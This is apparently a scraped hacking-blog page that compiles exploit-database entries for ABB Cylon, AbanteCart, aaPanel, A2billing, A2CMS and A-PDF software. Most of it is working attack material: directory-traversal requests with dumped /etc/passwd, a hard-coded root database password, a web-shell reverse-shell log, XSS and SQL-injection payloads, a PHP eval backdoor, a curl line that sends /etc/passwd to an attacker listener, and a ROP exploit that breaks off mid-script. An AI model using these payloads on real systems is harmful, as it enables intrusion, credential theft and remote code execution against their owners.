# Exploit Title : ABB Cylon Aspect 3.07.02 - File Disclosure
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.07.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The building management system suffers from an authenticated arbitrary
file disclosure vulnerability. Input passed through the 'file' GET parameter
through the 'downloadDb.php' script is not properly verified before being used
to download database files. This can be exploited to disclose the contents of
arbitrary and sensitive files via directory traversal attacks.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5831
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5831.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl "http://192.168.73.31/downloadDb.php?file=../../../../../../../../etc/passwd" \
> -H "Cookie: PHPSESSID=xxx"
root:x:0:0:root:/home/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
messagebus:x:999:998::/var/lib/dbus:/bin/false
systemd-journal-gateway:x:998:995::/home/systemd-journal-gateway:
avahi:x:997:994::/var/run/avahi-daemon:/bin/false
avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false
sshd:x:995:992::/var/run/sshd:/bin/false
xuser:x:1000:1000::/home/xuser:
ppp:x:994:65534::/dev/null:/usr/sbin/ppp-dialin
mysql:x:993:65534::/var/mysql:
aamtech:x:500:500::/home/aamtech:/bin/sh
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
86380680
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title : ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.07.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller is operating with default and hard-coded
credentials contained in install package while exposed to the Internet.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
phpMyAdmin 2.11.9
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Reported by DIVD
Advisory ID: ZSL-2024-5830
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5830.php
CVE ID: CVE-2024-4007
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-4007
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ cat max/var/www/html/phpMyAdmin/config.inc.php | grep control
$cfg['Servers'][$i]['controluser'] = 'root';
$cfg['Servers'][$i]['controlpass'] = 'F@c1liTy';
# Exploit Title: Abantecart v1.3.2 - Authenticated Remote Code Execution
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 3rd Mar'2022
# CVE ID: CVE-2022-26521
# Confirmed on release 1.3.2
# Vendor: https://www.abantecart.com/download
###############################################
#Step1- Login with Admin Credentials
#Step2- Uploading .php files is disabled by default hence we need to abuse the functionality:
Goto Catalog=>Media Manager=>Images=>Edit=> Add php in Allowed file extensions
#Step3- Now Goto Add Media=>Add Resource=> Upload php web shell
#Step4- Copy the Resource URL location and execute it in the browser e.g. :
Visit //IP_ADDR/resources/image/18/7a/4.php (Remove the //) and get the reverse shell:
listening on [any] 4477 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 34532
Linux debian 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux
11:17:51 up 2:15, 1 user, load average: 1.91, 1.93, 1.52
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bitnami tty1 - 09:05 1:05m 0.20s 0.01s -bash
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$
# Exploit Title: AbanteCart 1.2.7 Stored XSS
# Date: 06-12-2016
# Software Link: http://www.abantecart.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
By default all user input is escaped using `htmlspecialchars`.
But we can pass `__e` value which is base64 encoded and unfortunatelly those datas are not cleaned.
http://security.szurek.pl/abantecart-127-stored-xss-and-sql-injection.html
2. Proof of Concept
For example `address_1="><script>alert(2);</script>&` can be encoded as: `__e=YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m`.
So create new order and set `address_1` value as `__e` using for example Burp:
```
Content-Disposition: form-data; name="__e"
YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m
```
# Exploit Title: Aastra 6755i SIP SP4 | Unauthorized Remote Reboot
# Date: 17/02/2018
# Exploit Author: Wadeek
# Hardware Version: 6755i
# Firmware Version: 3.3.1.4053 SP4
# Vendor Homepage: http://www.aastra.sg/
# Firmware Link: http://www.aastra.sg/cps/rde/aareddownload?file_id=6950-17778-_P32_XML&dsproject=www-aastra-sg&mtype=zip
== Web Fingerprinting ==
#===========================================
:www.shodan.io: "Server: Aragorn" "WWW-Authenticate: Basic realm" "Mitel 6755i"
#===========================================
:Device image: /aastra.png (160x50)
#===========================================
:Crash dump, Firmware version, Firmware model,...: /crashlog.html
#===========================================
== PoC ==
#================================================
:Unauthorized Remote Reboot ("crash.cfg" file is created after): /confirm.html
#================================================
Aardvark Topsites Multiple Vulnerabilities
Vendor: Aardvark Industries
Product: Aardvark Topsites
Version: <= 4.1.0
Website: http://www.aardvarkind.com/
BID: 9231
Description:
Aardvark Topsites is a popular free PHP topsites script. See URL for details.
Plaintext Database Pass Weakness:
The login info for the database being used by Aardvark topsites can be viewed in plaintext by anyone who has access to the admin panel. If an attacker can gain access to the admin panel he can then take control of the database that the Aardvark Topsites is using.lid forum number and to have read
Information Disclosure Vulnerability:
By default phpinfo() for the server hosting an Aardvark Topsite can be viewed in the sources directory [ /sources/info.php ] An easy work around for this is quite obvious. If you do not need this file delete it. And if you do need it, then move it to a more secure location :)
Path Disclosure Vulnerability:
There are multiple ways to disclose the full server path on an Aardvark Topsites. Most can be avoided by allowing visitors to the /sources/ directory. However, it is also possible by passing a null or invalid value to the "type" variable when viewing the graph feature.
SQL Injection Vulnerability:
Tampering with SQL queries is possible via the "method" variable in display.php You can test if you are vulnerable by accessing the url below.
http://topsitelocation/index.php?method=`
Also, these are prone to tampering. While it would be hard to exploit, the following should have input validated/sanitized a little better.
http://topsitelocation/index.php?a=lostpw&set=1&id=`
http://topsitelocation/index.php?a=lostpw&set=1&session_id=`
Solution:
Aardvark Industries were very prompt and professional in addressing these issues. You can now download Aardvark Topsites 4.1.1 which has new features along with the obvious security fixes.
Credits:
James Bercegay of the GulfTech Security Research Team.
# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated)
# Date: 22.02.2022
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://www.aapanel.com/
# Software Link: https://www.aapanel.com
# Version: 6.8.21
# Tested on: Ubuntu
Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa)
#Go to App Store
#Click to "install" in any free plugin.
#Change installation script to ../../../root/.ssh/id_rsa
POST /ajax?action=get_lines HTTP/1.1
Host: IP:7800
Content-Length: 41
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82
Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://IP:7800
Referer: http://IP:7800/soft
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0;
request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd;
serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13;
page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot;
distribution=ubuntu; serial_no=; pro_end=-1; load_page=null;
load_type=null; load_search=undefined; force=0; rank=list;
Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/;
path_dir_change=/www/wwwroot/
Connection: close
num=10&filename=../../../root/.ssh/id_rsa
# Exploit Title: [aaPanel 6.6.6 - Authenticated Privilege Escalation]
# Google Dork: []
# Date: [04.05.2020]
# Exploit Author: [Ünsal Furkan Harani (Zemarkhos)]
# Vendor Homepage: [https://www.aapanel.com/](https://www.aapanel.com/)
# Software Link: [https://github.com/aaPanel/aaPanel](https://github.com/aaPanel/aaPanel)
# Version: [6.6.6] (REQUIRED)
# Tested on: [Linux ubuntu 4.4.0-131-generic #157-Ubuntu SMP Thu Jul 12 15:51:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux]
# CVE : [CVE-2020-14421]
if you are logged was admin;
1- go to the crontab
2- select shell script and paste your reverse shell code
3- click execute button and you are now root.
because crontab.py running with root privileges.
Remote Code Execution
https://github.com/jenaye/aapanel
source: https://www.securityfocus.com/bid/49883/info
A2CMS is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
http://www.example.com/js/index.php?f=../../../../etc/passwd 2011-09-28
# Title : A2billing 2.x , Sql injection vulnerability
# Vulnerable software : A2billing 2.x
# Author : Ahmed sultan (0x4148)
# Email : 0x4148@gmail.com
# Linkedin : https://www.linkedin.com/in/0x4148/
If you're looking for deep technical stuff , overcoming sanitization/hardening . . etc you can check out the full writeup at https://0x4148.com/2016/10/28/a2billing-all-versions-2-1-1-sql-injection-exploit/
A2billing is vulnerable to sql injection attack resulting from not enough sanitization of several inputs including transactionID
The sanitization proccess differ from version to another , but the concept is the same ,
I demonstrated bypassing the last version (2.1.1) , but still all versions till the moment are vulnerable as well with just little bit different modifications
File : agent/public/checkout_process.php
getpost_ifset(array('transactionID', 'sess_id', 'key', 'mc_currency',
'currency', 'md5sig', 'merchant_id', 'mb_amount', 'status', 'mb_currency',
'transaction_id', 'mc_fee', 'card_number'));
...................................................
// Status - New 0 ; Proceed 1 ; In Process 2
$QUERY = "SELECT id, agent_id, amount, vat, paymentmethod, cc_owner,
cc_number, cc_expires, creationdate, status, cvv, credit_card_type,
currency " .
" FROM cc_epayment_log_agent " .
" WHERE id = ".$transactionID." AND (status = 0 OR (status = 2 AND
$NOW_2MIN))";
$transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY);
POC :
Sending POST request : transactionID=456789111111 unise//**lectonselinse//**rtect 1,2,3,4,0x706c75676e706179,6,7,8,9,10,11,12,13-//**--&sess_id=4148key=636902c6ed0db5780eb613d126e95268
to : https://HOST/a2billing/agent/Public/checkout_process.php
will result in redirection of the application and the Location header will contain our decoded payment module which was used in the query "plugnpay" , which indicate successful injection
Full exploitation demo : https://www.youtube.com/watch?v=8dfdZCmPGWA
Exploit timeline :
01/10/2016 : vulnerability reported to vendor
06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP
04/09/2017 : Public release
Full exploit code is attached <loose code for demonstration purposes only>
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42615.zip
Thanks fly to R1z clan :)
# Title : A2billing 2.x , Unauthenticated Backup dump / RCE flaw
# Vulnerable software : A2billing 2.x
# Author : Ahmed Sultan (0x4148)
# Email : 0x4148@gmail.com
# Home : 0x4148.com
# Linkedin : https://www.linkedin.com/in/0x4148/
A2billing contain multiple flaws which can be chained together to achieve shell access over the a2b instance
If you're looking for deep technical stuff , check out the full writeup at https://0x4148.com/2016/10/28/a2billing-rce/
1 . backup dump
Vulnerable code
File : admin/public/form_data/FG_var_backup.inc
getpost_ifset(array('name','path','creationdate'));
$HD_Form = new FormHandler("cc_backup","Backup");
$HD_Form -> FG_DEBUG = 0;
if ($form_action!='ask-add')
check_demo_mode();
if ($form_action == 'add'){
$backup_file = $path;
if (substr($backup_file,-3)=='.gz'){
// WE NEED TO GZIP
$backup_file = substr($backup_file,0,-3);
$do_gzip=1;
}
// Make the backup stuff here and redirect to success page
//mysqldump -all --databases mya2billing -ua2billinguser
-pa2billing > /tmp/test.sql
//pg_dump -c -d -U a2billinguser -h localhost -f /tmp/test.sql
mya2billing
if (DB_TYPE != 'postgres'){
$run_backup=MYSQLDUMP." -all --databases ".DBNAME." -u'".USER."'
-p'".PASS."' > '{$backup_file}'";
}else{
$env_var="PGPASSWORD='".PASS."'";
putenv($env_var);
$run_backup=PG_DUMP." -c -d -U ".USER." -h ".HOST." -f '{$backup_file}'
".DBNAME;
}
if ($FG_DEBUG == 1 ) echo $run_backup."<br>";
>>>> exec($run_backup,$output,$error);
if ($do_gzip){
// Compress file
$run_gzip = GZIP_EXE." '$backup_file'";
if ($FG_DEBUG == 1 ) echo $run_gzip."<br>";
>>>> exec($run_gzip,$output,$error_zip);
}
File is being called at "admin/Public/A2B_entity_backup.php" before the authentication checking proccess take place so to dump full backup we can just move to :
http://HOST//a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.sql
backup will be found at admin/Public/0x4148.sql
few hardening is being carried out by the application which did great job preventing direct RCE flaw , so we had to figure out sth else
2 . SQL injection
File name : ckeckout_process.php
Line 287 : $Query = "INSERT INTO cc_payments_agent ( agent_id, agent_name,
agent_email_address, item_name, item_id, item_quantity, payment_method,
cc_type, cc_owner, cc_number, " .
" cc_expires, orders_status, last_modified, date_purchased,
orders_date_finished, orders_amount, currency, currency_value) values (" .
" '".$transaction_data[0][1]."', '".$customer_info[3]."
".$customer_info[2]."', '".$customer_info["email"]."', 'balance', '".
$customer_info[0]."', 1, '$pmodule',
'".$_SESSION["p_cardtype"]."', '".$transaction_data[0][5]."',
'".$transaction_data[0][6]."', '".
$transaction_data[0][7]."', $orderStatus, '".$nowDate."',
'".$nowDate."', '".$nowDate."', ".$amount_paid.", '".$currCurrency."', '".
$currencyObject->get_value($currCurrency)."' )";
$result = $DBHandle_max -> Execute($Query);
By exploiting this flaw we can insert malicious data into the db using the following query <thanks to i-Hmx for the great hint>
transactionID=456789111111 unise//**lecton selinse//**rtect
1,2,3,4,0x706c75676e706179,0x3c3f706870206576616c286261736536345f6465636f646528245f504f53545b6e61696c69745d29293b203f3e,7,8,9,10,11,12,13-//**-
-&sess_id=4148&key=98346a2b29c131c78dc89b50894176eb
After sending this request the following payload "<?php
eval(base64_decode($_POST[nailit])); ?>" will be injected directly into the
DB
3 . RCE
after injecting the malicious code we can just dump backup again but this time we will name it "0x4148.php" , so our code can be executed :)
[root@localhost Public]# curl '
https://127.0.0.1/a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.php' --insecure
[root@localhost Public]# cat 0x4148.php | grep nailit
INSERT INTO `cc_payments_agent` VALUES (295,2,'
','','balance','',1,'plugnpay','','66666666666666666666666666666666666666666666','77777777777777777777777777777777','8',-1,'3.000000','2016-10-28
10:57:10','2016-10-28 10:57:10','2016-10-28
10:57:10','usd','0.000000'),(296,2,'
','','balance','',1,'plugnpay','','<?php
eval(base64_decode($_POST[nailit])); ?>','7','8',-1,'3.000000','2016-10-28
10:58:22','2016-10-28 10:58:22','2016-10-28 10:58:22','usd','0.000000');
Now just exploit it via post nailit=base64_encoded php code to admin/Public/0x4148.php for instance system(‘x=$(cat /etc/passwd);curl -d “$x”
http://x.x.x.x:8000/0x4148.jnk’); will read /etc/passwd and send it to our nc listener
Exploit timeline :
01/10/2016 : vulnerability reported to vendor
06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP
04/09/2017 : Public release
Credits,
Ahmed Sultan - Cyber Security Analyst @ EG-CERT
#!/usr/bin/python
# Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain
# Date: 16 November 2023
# Exploit Author: George Washington
# Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: 2.0.0
# Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64
# Based on: https://www.exploit-db.com/exploits/17275
# Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe
# Video: https://youtu.be/_JEgdKjbtpI
import socket, struct
file = "1.wav"
size = 8000
############ Parameters for HeapCreate() ############
EXE = b"ZZZZ" # HeapCreate()
EXE += b"AAAA" # RET
EXE += struct.pack("<I", 0x00040000) # Parameter 1 0x00040000
EXE += struct.pack("<I", 0x00000000) # Parameter 2 0x00000000
EXE += struct.pack("<I", 0x00000000) # Parameter 3 0x00000000
EXE += b"YYYY" # HeapAlloc()
EXE += b"BBBB" # RET
EXE += b"CCCC" # Parameter 1 hHandle
EXE += struct.pack("<I", 0x00000008) # Parameter 2 0x00000008
EXE += struct.pack("<I", 0x00000500) # Parameter 3 0x00000500
EXE += struct.pack("<I", 0x1002dd98) # _memcpy_s()
EXE += b"DDDD" # heap pointer
EXE += b"EEEE" # heap pointer
EXE += struct.pack("<I", 0x00000500) # size
EXE += b"GGGG" # shellcode pointer
EXE += struct.pack("<I", 0x00000500) # size
junk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2C